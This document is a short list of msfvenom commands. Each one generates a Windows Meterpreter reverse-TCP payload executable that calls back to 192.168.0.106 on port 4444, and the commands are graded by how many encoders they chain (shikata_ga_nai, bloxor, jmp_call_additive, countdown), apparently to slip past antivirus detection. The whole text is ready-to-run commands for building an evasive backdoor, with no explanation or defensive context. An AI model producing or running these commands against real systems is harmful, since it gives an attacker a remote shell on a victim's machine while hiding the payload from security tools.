1 encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -k -i 14 -n 4 --smallest -f exe -o /root/payload.exe 

2 encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -k -i 14 -n 4 | msfvenom -a x86 --platform windows -i 22 -n 4 -e x86/bloxor --smallest -f exe -o /root/payload.exe 

3 encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -k -i 14 -n 4 | msfvenom -a x86 --platform windows -i 22 -n 4 -e x86/bloxor | msfvenom -a x86 --platform windows -i 22 -n 4 -e x86/jmp_call_additive --smallest -f exe -o /root/payload.exe 

4 encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -k -i 14 -n 14 | msfvenom -a x86 --platform windows -i 22 -n 14 -e x86/bloxor | msfvenom -a x86 --platform windows -i 8 -n 14 -e x86/jmp_call_additive | msfvenom -a x86 --platform windows -i 8 -n 4 -e x86/countdown --smallest -f exe -o /root/payload.exe
